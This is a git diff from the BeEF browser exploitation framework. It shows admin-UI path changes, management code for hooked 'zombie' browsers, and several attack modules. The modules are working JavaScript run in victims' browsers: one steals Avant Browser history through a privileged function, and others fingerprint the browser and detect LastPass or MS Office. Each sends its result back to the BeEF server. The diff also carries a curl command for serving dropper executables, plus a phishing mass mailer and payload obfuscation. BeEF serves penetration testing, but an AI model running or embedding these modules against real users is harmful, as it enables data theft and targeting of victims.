has_flash = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFlash')
has_web_sockets = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebSocket')
has_googlegears = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasGoogleGears')
has_java = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'JavaEnabled')
has_webrtc = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWebRTC')
has_activex = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasActiveX')
has_silverlight = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasSilverlight')
has_quicktime = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasQuickTime')
has_realplayer = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasRealPlayer')
has_wmp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasWMP')
has_vlc = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasVLC')
has_foxit = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'HasFoxit')
date_stamp = BeEF::Core::Models::BrowserDetails.get(hooked_browser.session, 'DateStamp')
@@ -113,13 +111,11 @@ module BeEF
'has_flash' => has_flash,
'has_web_sockets' => has_web_sockets,
'has_googlegears' => has_googlegears,
'has_java' => has_java,
'has_webrtc' => has_webrtc,
'has_activex' => has_activex,
'has_silverlight' => has_silverlight,
'has_quicktime' => has_quicktime,
'has_wmp' => has_wmp,
'has_vlc' => has_vlc,
'has_foxit' => has_foxit,
'has_realplayer' => has_realplayer,
'date_stamp' => date_stamp

2
extensions/admin_ui/media/javascript-min/readme Normal file
View File

@@ -0,0 +1,2 @@
This directory will contain minified JavaScript files used by the Web UI.
Those files are excluded from the GIT report through the .gitignore file.

5
extensions/admin_ui/media/javascript/esapi/jquery-encoder-0.1.0.js
View File

File diff suppressed because one or more lines are too long

36
extensions/admin_ui/media/javascript/ext-beef.js
View File

@@ -1,36 +0,0 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
Ext.beef = function(){
var msgCt;
function createBox(t, s){
return ['<div class="msg">',
'<div class="x-box-tl"><div class="x-box-tr"><div class="x-box-tc"></div></div></div>',
'<div class="x-box-ml"><div class="x-box-mr"><div class="x-box-mc"><h3>', t, '</h3>', s, '</div></div></div>',
'<div class="x-box-bl"><div class="x-box-br"><div class="x-box-bc"></div></div></div>',
'</div>'].join('');
}
return {
msg : function(title, format){
if(!msgCt){
msgCt = Ext.DomHelper.insertFirst(document.body, {id:'msg-div'}, true);
}
msgCt.alignTo(document, 't-t');
var s = String.format.apply(String, Array.prototype.slice.call(arguments, 1));
var m = Ext.DomHelper.append(msgCt, {html:createBox(title, s)}, true);
m.slideIn('t').pause(1).ghost("t", {remove:true});
},
init : function(){
var lb = Ext.get('lib-bar');
if(lb){
lb.show();
}
}
};
}();

2
extensions/admin_ui/media/javascript/ui/authentication.js
View File

@@ -12,7 +12,7 @@ Ext.onReady(function() {
login_form.getForm().submit({
success: function() {
window.location.href = '/ui/panel'
window.location.href = "<%= @base_path %>/panel"
},
failure: function() {
if(Ext.get('loginError') == null) {

2
extensions/admin_ui/media/javascript/ui/common/beef_common.js
View File

@@ -20,7 +20,7 @@ if(typeof beefwui === 'undefined' && typeof window.beefwui === 'undefined') {
*/
get_rest_token: function() {
if(this.rest_token.length == 0){
var url = "/ui/modules/getRestfulApiToken.json";
var url = "<%= @base_path %>/modules/getRestfulApiToken.json";
jQuery.ajax({
contentType: 'application/json',
dataType: 'json',

6
extensions/admin_ui/media/javascript/ui/panel/DataGrid.js
View File

@@ -45,7 +45,7 @@ DataGrid = function(url, page, base) {
dataIndex: 'type',
sortable: true,
width: 60,
renderer: function(value, metaData, record, rowIndex, colIndex, store) {
renderer: function(value) {
return "<b>" + $jEncoder.encoder.encodeForHTML(value) + "</b>";
}
}, {
@@ -54,7 +54,9 @@ DataGrid = function(url, page, base) {
dataIndex: 'event',
sortable:true,
width: 420,
renderer: $jEncoder.encoder.encodeForHTML(this.formatTitle)
renderer: function(value){
return $jEncoder.encoder.encodeForHTML(value);
}
}, {
id: 'log-date',
header: "Date",

4
extensions/admin_ui/media/javascript/ui/panel/Logout.js
View File

@@ -10,12 +10,12 @@ DoLogout = function() {
after_logout = function() {
// will redirect the UA to the login
window.location.href = '/ui/panel'
window.location.href = '<%= @base_path %>/panel'
}
button.on('click', function(){
Ext.Ajax.request({
url: '/ui/authentication/logout',
url: '<%= @base_path %>/authentication/logout',
method: 'POST',
params: 'nonce=' + Ext.get("nonce").dom.value,
success: after_logout,

2
extensions/admin_ui/media/javascript/ui/panel/MainPanel.js
View File

@@ -29,7 +29,7 @@ MainPanel = function(){
}
});
this.grid = new DataGrid('/ui/logs/all.json',30);
this.grid = new DataGrid('<%= @base_path %>/logs/all.json',30);
this.grid.border = false;
this.welcome_tab = new WelcomeTab;
//this.hooks_tab = new HooksTab;

4
extensions/admin_ui/media/javascript/ui/panel/PanelViewer.js
View File

@@ -47,7 +47,7 @@ var lastpoll = new Date().getTime();
Ext.TaskMgr.start({
run: function() {
Ext.Ajax.request({
url: '/ui/panel/hooked-browser-tree-update.json',
url: '<%= @base_path %>/panel/hooked-browser-tree-update.json',
method: 'POST',
success: function(response) {
var updates;
@@ -56,7 +56,7 @@ Ext.TaskMgr.start({
} catch (e) {
//The framework has probably been reset and you're actually logged out
var hr = document.getElementById("header-right");
hr.innerHTML = "You appear to be logged out. <a href='/ui/panel/'>Login</a>";
hr.innerHTML = "You appear to be logged out. <a href='<%= @base_path %>/panel/'>Login</a>";
}
var distributed_engine_rules = (updates['ditributed-engine-rules']) ? updates['ditributed-engine-rules'] : null;
var hooked_browsers = (updates['hooked-browsers']) ? updates['hooked-browsers'] : null;

2
extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
View File

@@ -12,7 +12,7 @@ WelcomeTab = function() {
welcome = " \
<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
<p><img src='/ui/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
<p><img src='<%= @base_path %>/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
<p>Official website: <a href='http://beefproject.com/'>http://beefproject.com/</a></p><br />\
<p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
<p>Welcome to BeEF!</p><br /> \

10
extensions/admin_ui/media/javascript/ui/panel/ZombiesMgr.js
View File

@@ -26,20 +26,18 @@ var ZombiesMgr = function(zombies_tree_lists) {
var has_flash = zombie_array[index]["has_flash"];
var has_web_sockets = zombie_array[index]["has_web_sockets"];
var has_googlegears = zombie_array[index]["has_googlegears"];
var has_java = zombie_array[index]["has_java"];
var has_webrtc = zombie_array[index]["has_webrtc"];
var has_activex = zombie_array[index]["has_activex"];
var has_wmp = zombie_array[index]["has_wmp"];
var has_vlc = zombie_array[index]["has_vlc"];
var has_foxit = zombie_array[index]["has_foxit"];
var has_silverlight = zombie_array[index]["has_silverlight"];
var has_quicktime = zombie_array[index]["has_quicktime"];
var has_realplayer = zombie_array[index]["has_realplayer"];
var date_stamp = zombie_array[index]["date_stamp"];
text = "<img src='/ui/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= "<img src='/ui/media/images/icons/"+escape(os_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= "<img src='/ui/media/images/icons/"+escape(hw_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text = "<img src='<%= @base_path %>/media/images/icons/"+escape(browser_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= "<img src='<%= @base_path %>/media/images/icons/"+escape(os_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= "<img src='<%= @base_path %>/media/images/icons/"+escape(hw_icon)+"' style='padding-top:3px;' width='13px' height='13px'/> ";
text+= ip;
balloon_text = "IP: " + ip;
@@ -48,14 +46,12 @@ var ZombiesMgr = function(zombies_tree_lists) {
balloon_text+= "<br/>Hardware: " + hw_name;
balloon_text+= "<br/>Domain: " + domain + ":" + port;
balloon_text+= "<br/>Flash: " + has_flash;
balloon_text+= "<br/>Java: " + has_java;
balloon_text+= "<br/>Web Sockets: " + has_web_sockets;
balloon_text+= "<br/>WebRTC: " + has_webrtc;
balloon_text+= "<br/>ActiveX: " + has_activex;
balloon_text+= "<br/>Silverlight: " + has_silverlight;
balloon_text+= "<br/>QuickTime: " + has_quicktime;
balloon_text+= "<br/>Windows MediaPlayer: " + has_wmp;
balloon_text+= "<br/>VLC: " + has_vlc;
balloon_text+= "<br/>Foxit: " + has_foxit;
balloon_text+= "<br/>RealPlayer: " + has_realplayer;
balloon_text+= "<br/>Google Gears: " + has_googlegears;

43
extensions/admin_ui/media/javascript/ui/panel/common.js
View File

@@ -111,7 +111,7 @@ function get_dynamic_payload_details(payload, zombie) {
modid = Ext.getCmp( 'form-zombie-'+zombie.session+'-field-mod_id').value
Ext.Ajax.request({
loadMask: true,
url: '/ui/modules/select/commandmodule.json',
url: '/<%= @base_path %>/modules/select/commandmodule.json',
method: 'POST',
params: 'command_module_id=' + modid + '&' + 'payload_name=' + payload,
success: function(resp) {
@@ -146,7 +146,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
panel.removeAll();
Ext.Ajax.request({
url: '/ui/modules/select/command.json',
url: '<%= @base_path %>/modules/select/command.json',
method: 'POST',
params: 'command_id=' + command_id,
loadMask: true,
@@ -159,7 +159,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
}
var form = new Ext.form.FormPanel({
url: '/ui/modules/commandmodule/reexecute',
url: '<%= @base_path %>/modules/commandmodule/reexecute',
id: 'form-command-module-zombie-'+zombie.session,
border: false,
labelWidth: 75,
@@ -208,7 +208,7 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
});
var grid_store = new Ext.data.JsonStore({
url: '/ui/modules/select/command_results.json?command_id='+command_id,
url: '<%= @base_path %>/modules/select/command_results.json?command_id='+command_id,
storeId: 'command-results-store-zombie-'+zombie.session,
root: 'results',
remoteSort: false,
@@ -241,7 +241,8 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
viewConfig: {
forceFit:true
},
// render command responses
columns:[new Ext.grid.RowNumberer({width: 20}), {
dataIndex: 'date',
sortable: false,
@@ -249,21 +250,27 @@ function genExistingExploitPanel(panel, command_id, zombie, sb) {
html = String.format("<div style='color:#385F95;text-align:right;'>{0}</div>", value);
html += '<p>';
for(index in record.data.data) {
result = $jEncoder.encoder.encodeForHTML(record.data.data[index]).replace(/&lt;br&gt;/g,'<br>');
index = index.toString().replace('_', ' ');
// Check if the data is the image parameter and that it's a base64 encoded png.
if (result.substring(0,28) == "image=data:image/png;base64,") {
// Lets display the image
result = record.data.data[index];
index = index.toString().replace('_', ' ');
// Check for a base64 encoded image
var header = "image=data:image/(jpg|png);base64,";
var re = new RegExp(header, "");
if (result.match(re)) {
// Render the image
try {
base64_data = window.atob(result.substring(29,result.length));
html += String.format('<img src="{0}" /><br>', result.substring(6));
var img = result.replace(/[\r\n]/g, '');
base64_data = window.atob(img.replace(re, ''));
html += String.format('<img src="{0}" /><br>', img.replace(/^image=/, ''));
} catch(e) {
beef.debug("Received invalid base64 encoded image string: "+e.toString());
console.log("Received invalid base64 encoded image string: "+e.toString());
html += String.format('<b>{0}</b>: {1}<br>', index, result);
}
// output escape everything else, but allow the <br> tag for better rendering.
} else {
// output escape everything, but allow the <br> tag for better rendering.
html += String.format('<b>{0}</b>: {1}<br>', index, result);
html += String.format('<b>{0}</b>: {1}<br>', index, $jEncoder.encoder.encodeForHTML(result).replace(/&lt;br&gt;/g,'<br>'));
}
}
@@ -313,7 +320,7 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
} else {
Ext.Ajax.request({
loadMask: true,
url: '/ui/modules/select/commandmodule.json',
url: '<%= @base_path %>/modules/select/commandmodule.json',
method: 'POST',
params: 'command_module_id=' + command_module_id,
success: function(resp) {
@@ -324,9 +331,9 @@ function genNewExploitPanel(panel, command_module_id, command_module_name, zombi
return;
}
var submiturl = '/ui/modules/commandmodule/new';
var submiturl = '<%= @base_path %>/modules/commandmodule/new';
if(module.dynamic){
submiturl = '/ui/modules/commandmodule/dynamicnew';
submiturl = '<%= @base_path %>/modules/commandmodule/dynamicnew';
}
module = module.command_modules[1];

2
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabAutorun.js
View File

@@ -248,7 +248,7 @@ ZombieTab_Autorun = function(zombie) {
}
}})],
loader: new Ext.tree.TreeLoader({
dataUrl: '/ui/modules/select/commandmodules/tree.json',
dataUrl: '<%= @base_path %>/modules/select/commandmodules/tree.json',
baseParams: {zombie_session: zombie.session},
createNode: function(attr) {
if(attr.checked == null){attr.checked = false;}

4
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabCommands.js
View File

@@ -19,7 +19,7 @@ ZombieTab_Commands = function(zombie) {
var command_module_grid = new Ext.grid.GridPanel({
store: new Ext.data.JsonStore({
url: '/ui/modules/commandmodule/commands.json',
url: '<%= @base_path %>/modules/commandmodule/commands.json',
params: { // insert the nonce with the form
nonce: Ext.get ("nonce").dom.value
},
@@ -107,7 +107,7 @@ ZombieTab_Commands = function(zombie) {
rootVisible: false,
root: {nodeType: 'async'},
loader: new Ext.tree.TreeLoader({
dataUrl: '/ui/modules/select/commandmodules/tree.json',
dataUrl: '<%= @base_path %>/modules/select/commandmodules/tree.json',
baseParams: {zombie_session: zombie.session},
listeners:{
beforeload: function(treeloader, node, callback) {

2
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabDetails.js
View File

@@ -10,7 +10,7 @@
ZombieTab_DetailsTab = function(zombie) {
var store_summary = new Ext.data.GroupingStore({
url: '/ui/modules/select/zombie_summary.json',
url: '<%= @base_path %>/modules/select/zombie_summary.json',
baseParams: {zombie_session: zombie.session} ,
reader: new Ext.data.JsonReader({
root: 'results'

2
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabLogs.js
View File

@@ -9,7 +9,7 @@
*/
ZombieTab_LogTab = function(zombie) {
var zombieLog = new DataGrid('/ui/logs/zombie.json',30,{session:zombie.session});
var zombieLog = new DataGrid('<%= @base_path %>/logs/zombie.json',30,{session:zombie.session});
zombieLog.border = false;
ZombieTab_LogTab.superclass.constructor.call(this, {

10
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabRider.js
View File

@@ -32,7 +32,7 @@ ZombieTab_Requester = function(zombie) {
title: 'Proxy',
layout: 'fit',
padding: '10 10 10 10',
html: "<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' ><p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/proxy.png'></p><p>The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/history.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.</p><p style='margin: 10 0 10 0'><img src='/ui/media/images/help/forge.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>For more information see: <a href=\"https://github.com/beefproject/beef/wiki/Tunneling\">https://github.com/beefproject/beef/wiki/Tunneling</a></p></div>",
html: "<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' ><p style='font:11px tahoma,arial,helvetica,sans-serif'>The Tunneling Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\".</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/proxy.png'></p><p>The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Rider tab. Click a history item to view the HTTP headers and HTML source of the HTTP response.</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/history.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>To manually forge an arbitrary HTTP request use the \"Forge Request\" tab from the Rider tab.</p><p style='margin: 10 0 10 0'><img src='<%= @base_path %>/media/images/help/forge.png'></p><p style='font:11px tahoma,arial,helvetica,sans-serif'>For more information see: <a href=\"https://github.com/beefproject/beef/wiki/Tunneling\">https://github.com/beefproject/beef/wiki/Tunneling</a></p></div>",
listeners: {
activate: function(proxy_panel) {
// to do: refresh list of hooked browsers
@@ -56,7 +56,7 @@ ZombieTab_Requester = function(zombie) {
********************************************/
var history_panel_store = new Ext.ux.data.PagingJsonStore({
storeId: 'requester-history-store-zombie-'+zombie.session,
url: '/ui/requester/history.json',
url: '<%= @base_path %>/requester/history.json',
remoteSort: false,
autoDestroy: true,
autoLoad: false,
@@ -169,7 +169,7 @@ ZombieTab_Requester = function(zombie) {
listeners: {
activate: function(history_panel) {
history_panel.items.items[0].store.reload({params:{url:'/ui/requester/history.json'}});
history_panel.items.items[0].store.reload({params:{url:'<%= @base_path %>/requester/history.json'}});
}
}
});
@@ -190,7 +190,7 @@ ZombieTab_Requester = function(zombie) {
var form = new Ext.FormPanel({
title: 'Forge Raw HTTP Request',
id: 'requester-request-form-zombie'+zombie.session,
url: '/ui/requester/send',
url: '<%= @base_path %>/requester/send',
hideLabels : true,
border: false,
padding: '3px 5px 0 5px',
@@ -251,7 +251,7 @@ ZombieTab_Requester = function(zombie) {
bar.update_sending('Getting response...');
Ext.Ajax.request({
url: '/ui/requester/response.json',
url: '<%= @base_path %>/requester/response.json',
loadMask: true,
params: {

4
extensions/admin_ui/media/javascript/ui/panel/tabs/ZombieTabXssRays.js
View File

@@ -23,7 +23,7 @@ ZombieTab_XssRaysTab = function(zombie) {
var xssrays_logs_store = new Ext.ux.data.PagingJsonStore({
storeId: 'xssrays-logs-store-zombie-' + zombie.session,
url: '/ui/xssrays/zombie.json',
url: '/<%= @base_path %>/xssrays/zombie.json',
remoteSort: false,
autoDestroy: true,
autoLoad: false,
@@ -94,7 +94,7 @@ ZombieTab_XssRaysTab = function(zombie) {
var form = new Ext.FormPanel({
title: 'Scan settings',
id: 'xssrays-config-form-zombie'+zombie.session,
url: '/ui/xssrays/createNewScan',
url: '<%= @base_path %>/xssrays/createNewScan',
labelWidth: 230,
border: false,
padding: '3px 5px 0 5px',

4
extensions/admin_ui/media/javascript/ui/panel/zombiesTreeList.js
View File

@@ -85,14 +85,14 @@ Ext.extend(zombiesTreeList, Ext.tree.TreePanel, {
switch (item.id) {
case 'use_as_proxy':
Ext.Ajax.request({
url: '/ui/proxy/setTargetZombie',
url: '<%= @base_path %>/proxy/setTargetZombie',
method: 'POST',
params: 'hb_id=' + escape(hb_id)
});
break;
case 'xssrays_hooked_domain':
Ext.Ajax.request({
url: '/ui/xssrays/set_scan_target',
url: '<%= @base_path %>/xssrays/set_scan_target',
method: 'POST',
params: 'hb_id=' + escape(hb_id)
});

3
extensions/admin_ui/media/javascript/wterm/wterm.jquery.js
View File

@@ -422,3 +422,6 @@
};
})( jQuery );
var $jwterm = jQuery.noConflict();

6
extensions/demos/html/basic.html
View File

@@ -1,10 +1,10 @@
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<!--
Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
Browser Exploitation Framework (BeEF) - http://beefproject.com
See the file 'doc/COPYING' for copying permission
-->
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>BeEF Basic Demo</title>
<script>
@@ -19,7 +19,6 @@
Have fun while your browser is working against you.
</p>
<p>
These links are for demonstrating the "Get Page HREFs" command module<br />
<ul>
@@ -28,7 +27,6 @@
<li><a href="http://slashdot.org/" target="_blank">Slashdot</a>
</ul>
</p>
<p>Have a go at the event logger.<br />
<label for="imptxt">Insert your secret here:</label>&nbsp;&nbsp;<input type="text" id="imptxt" name="Important Text" /></p>

4
extensions/evasion/obfuscation/minify.rb
View File

@@ -6,7 +6,7 @@
module BeEF
module Extension
module Evasion
require 'jsmin'
require 'uglifier'
class Minify
include Singleton
@@ -15,7 +15,7 @@ module BeEF
end
def execute(input, config)
input = JSMin.minify(input)
input = Uglifier.compile(input)
print_debug "[OBFUSCATION - MINIFIER] Javascript has been minified"
input
end

3
extensions/metasploit/config.yaml
View File

@@ -33,6 +33,9 @@ beef:
{os: 'bt5r3', path: '/opt/metasploit/msf3/'},
{os: 'bt5', path: '/opt/framework3/msf3/'},
{os: 'backbox', path: '/opt/metasploit3/msf3/'},
{os: 'kali', path: '/usr/share/metasploit-framework/'},
#{os: 'pentoo', path: '/usr/lib64/metasploit9999/'},
{os: 'pentoo', path: '/usr/lib/metasploit'},
{os: 'win', path: 'c:\\metasploit-framework\\'},
{os: 'custom', path: ''}
]

9
extensions/social_engineering/droppers/readme.txt Normal file
View File

@@ -0,0 +1,9 @@
This directory will contain the droppers (executables, JARs, browser extensions, etc..)
that you want to have available on the BeEF server.
For example, if you want to have bin.exe available at http://beefserver/bin.exe,
use the following RESTful API call:
curl -H "Content-Type: application/json; charset=UTF-8" -d
'{"mount":"/bin.exe", "local_file":"/extensions/social_engineering/droppers/bin.exe"}'
-X POST http://beefserver/api/server/bind?token=<token>

2
extensions/social_engineering/mass_mailer/mass_mailer.rb
View File

@@ -56,7 +56,7 @@ module BeEF
end
end
else
smtp.start(@helo, @auth) do |smtp|
smtp.start(@helo) do |smtp|
tos_hash.each do |to, name|
message = compose_email(fromname, fromaddr, to, name, subject, link, linktext, template)
smtp.send_message(message, fromaddr, to)

4
install-beef
View File

@@ -5,6 +5,8 @@
# See the file 'doc/COPYING' for copying permission
#
set -e
clear
echo "======================================"
echo " BeEF Installer "
@@ -76,7 +78,7 @@ if [ "$Distro" == "Debian" ]; then
sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion
bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)
curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash
echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc

2
liveCD/BeEFLive.sh
View File

@@ -189,6 +189,8 @@ show_menu() {
git stash
git pull
msf="0"
# check for new bundle requirements and update
bundle update
fi
#

38
modules/browser/avant_steal_history/command.js
View File

@@ -15,37 +15,33 @@
//
beef.execute(function() {
if (!beef.browser.isA()) {
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Target browser is not Avant Browser.");
return;
}
var avant_iframe = document.createElement("iframe");
//var avant_iframe = beef.dom.createInvisibleIframe();
avant_iframe.setAttribute('src', "browser:home");
avant_iframe.setAttribute('name','test2');
avant_iframe.setAttribute('width','0');
avant_iframe.setAttribute('heigth','0');
avant_iframe.setAttribute('src', 'browser:home');
avant_iframe.setAttribute('name', 'avant_history_<%= @command_id %>');
avant_iframe.setAttribute('width', '0');
avant_iframe.setAttribute('heigth', '0');
avant_iframe.setAttribute('scrolling','no');
avant_iframe.setAttribute('style', 'display:none');
document.body.appendChild(avant_iframe);
var vstr = {value: ""};
if(window['test2'].navigator) {
//This works if FF is the rendering engine
window['test2'].navigator.AFRunCommand(<%= @cId %>, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, vstr.value);
if (window['avant_history_<%= @command_id %>'].navigator) {
//This works if FF is the rendering engine
window['avant_history_<%= @command_id %>'].navigator.AFRunCommand(<%= @cId %>, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result="+vstr.value);
} else {
// this works if Chrome is the rendering engine
//window['avant_history_<%= @command_id %>'].AFRunCommand(60003, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Exploit failed. Rendering engine is not set to Firefox.");
}
else {
// this works if Chrome is the rendering engine
//window['test2'].AFRunCommand(60003, vstr);
beef.net.send("<%= @command_url %>", <%= @command_id %>, "Exploit failed. Rendering engine is not set to Firefox");
}
});

4
modules/browser/avant_steal_history/config.yaml
View File

@@ -19,7 +19,7 @@ beef:
enable: true
category: "Browser"
name: "Get Visited URLs (Avant Browser)"
description: "Invoke AFRunCommand() privileged function. The integer 60003 is passed by default to dump the Avant Browser history."
description: "This module attempts to retrieve a user's browser history by invoking the 'AFRunCommand()' privileged function.<br/><br/>Note: Avant Browser in Firefox engine mode only."
authors: ["Roberto Suggi Liverani"]
target:
working: ["ALL"]
working: ["FF"]

4
modules/browser/browser_fingerprinting/command.js
View File

@@ -34,6 +34,10 @@ beef.execute(function() {
new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"),
new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),
new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),
new Array("Firefox","9+","resource:///chrome/browser/skin/classic/aero/browser/identity.png"),
new Array("Firefox","10+","chrome://browser/skin/sync-128.png"),
new Array("Firefox","13+","chrome://browser/content/abouthome/noise.png"),
new Array("Firefox","18+","resource:///chrome/browser/skin/classic/aero/browser/webRTC-shareDevice-16.png"),
new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),
new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),
new Array("Internet Explorer","7+","res://ieframe.dll/info_48.png")

29
modules/browser/detect_lastpass/command.js Normal file
View File

@@ -0,0 +1,29 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var result = "Not in use or not installed";
var lpdiv = document.getElementById('hiddenlpsubmitdiv');
if (typeof(lpdiv) != 'undefined' && lpdiv != null) {
//We've got the first detection of LP
result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";
} else if ($j("script:contains(lastpass_iter)").length > 0) {
//We've got the second detection of LP
result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
} else {
//Form is not there, lets check for any form elements in this page, because, LP won't activate at all without a <form>
if (document.getElementsByTagName("form").length == 0) {
//No forms
result = "The page doesn't seem to include any forms - we can't tell if LastPass is installed";
}
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "lastpass="+result);
});

16
modules/browser/detect_lastpass/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_lastpass:
enable: true
category: "Browser"
name: "Detect LastPass"
description: "This module checks if the LastPass extension is installed and active."
authors: ["xntrik"]
target:
not_working: ["IE"]
working: ["All"]

14
modules/browser/detect_lastpass/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_lastpass < BeEF::Core::Command
def post_execute
content = {}
content['lastpass'] = @datastore['lastpass'] if not @datastore['lastpass'].nil?
save content
end
end

44
modules/browser/detect_office/command.js Normal file
View File

@@ -0,0 +1,44 @@
//
// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
beef.execute(function() {
var ma = 1;
var mb = 1;
var mc = 1;
var md = 1;
try {
ma = new ActiveXObject("SharePoint.OpenDocuments.4")
} catch (e) {}
try {
mb = new ActiveXObject("SharePoint.OpenDocuments.3")
} catch (e) {}
try {
mc = new ActiveXObject("SharePoint.OpenDocuments.2")
} catch (e) {}
try {
md = new ActiveXObject("SharePoint.OpenDocuments.1")
} catch (e) {}
var a = typeof ma;
var b = typeof mb;
var c = typeof mc;
var d = typeof md;
var key = "No Office Found";
if (a == "object" && b == "object" && c == "object" && d == "object") {
key = "Office 2010"
}
if (a == "number" && b == "object" && c == "object" && d == "object") {
key = "Office 2007"
}
if (a == "number" && b == "number" && c == "object" && d == "object") {
key = "Office 2003"
}
if (a == "number" && b == "number" && c == "number" && d == "object") {
key = "Office Xp"
}
beef.net.send("<%= @command_url %>", <%= @command_id %>, "office="+key);
});

16
modules/browser/detect_office/config.yaml Normal file
View File

@@ -0,0 +1,16 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
beef:
module:
detect_office:
enable: true
category: "Browser"
name: "Detect MS Office"
description: "This module detect the version of MS Office if installed"
authors: ["nbblrr"]
target:
working: ["IE"]
not_working: ["All"]

14
modules/browser/detect_office/module.rb Normal file
View File

@@ -0,0 +1,14 @@
#
# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
# Browser Exploitation Framework (BeEF) - http://beefproject.com
# See the file 'doc/COPYING' for copying permission
#
class Detect_office < BeEF::Core::Command
def post_execute
content = {}
content['office'] = @datastore['office']
save content
